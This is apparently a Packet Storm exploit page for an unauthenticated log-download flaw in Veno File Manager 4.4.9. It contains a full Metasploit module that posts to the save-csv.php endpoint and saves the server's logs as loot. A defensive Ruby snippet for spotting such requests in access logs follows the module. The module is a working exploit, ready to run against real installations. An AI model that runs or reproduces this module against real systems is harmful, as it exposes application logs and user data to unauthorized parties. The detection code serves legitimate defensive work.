
📄 Veno File Manager 4.4.9 Log Disclosure

🗓️ 19 Jun 2026 00:00:00 | Reported by indoushka | Type: packetstorm | 🔗 packetstorm.news | 👁 32 Views

Unauthenticated attackers can download Veno File Manager 4.4.9 logs via the save-csv.php endpoint.

Code
==================================================================================================================================
    | # Title     : Veno File Manager 4.4.9 Unauthenticated Logs Download                                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits)                                                 |
    | # Vendor    : https://veno.es/updates/logs/?slug=vfm/                                                                          |
    ==================================================================================================================================
    
    [+] Summary    : This module allows unauthenticated attackers to download application logs from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
    
    [+] PoC        :
    
    ##
    # Module for Unauthenticated Logs Download
    ##
    class MetasploitModule < Msf::Auxiliary
      include Msf::Exploit::Remote::HttpClient
      include Msf::Auxiliary::Scanner
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Veno File Manager 4.4.9 - Unauthenticated Logs Download',
            'Description' => %q{
              This module allows unauthenticated attackers to download application logs
              from Veno File Manager 4.4.9 by exploiting the save-csv.php endpoint.
            },
            'Author' => ['indoushka'],
            'License' => MSF_LICENSE,
            'References' => [
              ['CVE', '2026-37070'],
              ['URL', 'https://github.com/jfs-jfs/CVE-2026-37070']
            ]
          )
        )
    
        register_options([
          OptString.new('TARGETURI', [true, 'Base path', '/']),
          OptString.new('START_DATE', [true, 'Start date (YYYY-MM-DD)', '2024-01-01'])
        ])
      end
    
      def run
        print_status("Downloading logs from #{datastore['START_DATE']}")
        target_url = normalize_uri(target_uri.path, 'vfm-admin', 'admin-panel', 'view', 'analytics', 'save-csv.php')
        res = send_request_cgi({
          'method' => 'POST',
          'uri' => target_url,
          'vars_post' => {
            'logsince' => datastore['START_DATE'],
            'loguntil' => '3000-12-31'
          }
        })
        if res && res.code == 200 && !res.body.empty?
          print_good("Logs downloaded successfully!")
          print_line(res.body)
          store_loot(
            'vfm.logs',
            'text/csv',
            rhost,
            res.body,
            "vfm_logs_#{datastore['START_DATE']}.csv",
            "VFM Logs from #{datastore['START_DATE']}"
          )
        else
          print_error("Failed to download logs")
        end
      end
    end
    
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
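
For defenders, a way to review web-server access logs for requests to the endpoint named in this report (an added example, not part of the original advisory or its module). Access logs do not record whether a request was authenticated, so the sketch reports POSTs to save-csv.php from outside an administrator allowlist; the `ADMIN_NETS` range, the combined log format and the sample lines are assumptions.

```ruby
require 'ipaddr'
require 'uri'

# Endpoint path as used by the module on this page.
VFM_CSV_PATH = '/vfm-admin/admin-panel/view/analytics/save-csv.php'
# Assumption: networks VFM administrators legitimately connect from.
ADMIN_NETS = [IPAddr.new('10.20.0.0/24')].freeze
# Leading fields of the Apache/nginx "combined" access log format.
COMBINED = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<verb>[A-Z]+) (?<uri>\S+)[^"]*" (?<status>\d{3}) (?<bytes>\d+|-)/

# Drop the query string, percent-decode, collapse "//" and lowercase
# (the report was tested on Windows, where paths are case-insensitive).
def normalized_path(uri)
  raw = uri.split('?', 2).first.to_s
  URI.decode_www_form_component(raw).squeeze('/').downcase
rescue ArgumentError
  raw.squeeze('/').downcase
end

# Unparseable client fields count as non-admin so they are still reported.
def admin_source?(ip, nets)
  addr = IPAddr.new(ip)
  nets.any? { |net| net.include?(addr) }
rescue ArgumentError
  false
end

# One hash per POST to save-csv.php from outside admin_nets. :served is true
# for a 200 with a non-empty body, the success condition the module checks.
def suspicious_csv_exports(lines, admin_nets = ADMIN_NETS)
  lines.filter_map do |line|
    m = COMBINED.match(line)
    next unless m && m[:verb] == 'POST'
    next unless normalized_path(m[:uri]).end_with?(VFM_CSV_PATH)
    next if admin_source?(m[:ip], admin_nets)
    { ip: m[:ip], time: m[:ts], status: m[:status].to_i,
      served: m[:status] == '200' && m[:bytes].to_i.positive? }
  end
end

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
  '203.0.113.7 - - [19/Jun/2026:10:01:02 +0000] "POST /vfm-admin/admin-panel/view/analytics/save-csv.php HTTP/1.1" 200 48213 "-" "curl/8.5.0"',
  '10.20.0.15 - - [19/Jun/2026:10:05:40 +0000] "POST /vfm-admin/admin-panel/view/analytics/save-csv.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [19/Jun/2026:10:09:13 +0000] "POST /files//VFM-Admin/admin-panel/view/analytics/save-csv.php HTTP/1.1" 403 199 "-" "-"',
  '203.0.113.7 - - [19/Jun/2026:10:09:30 +0000] "GET /vfm-admin/ HTTP/1.1" 200 1024 "-" "curl/8.5.0"'
].freeze
suspicious_csv_exports(SAMPLE_LOG).each { |hit| puts hit } if __FILE__ == $PROGRAM_NAME
```

A hit with `served: true` means the response carried data to a non-admin source; set `ADMIN_NETS` for your environment before running it over real log lines.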

Vulners AI Score: 5.9 (Medium risk)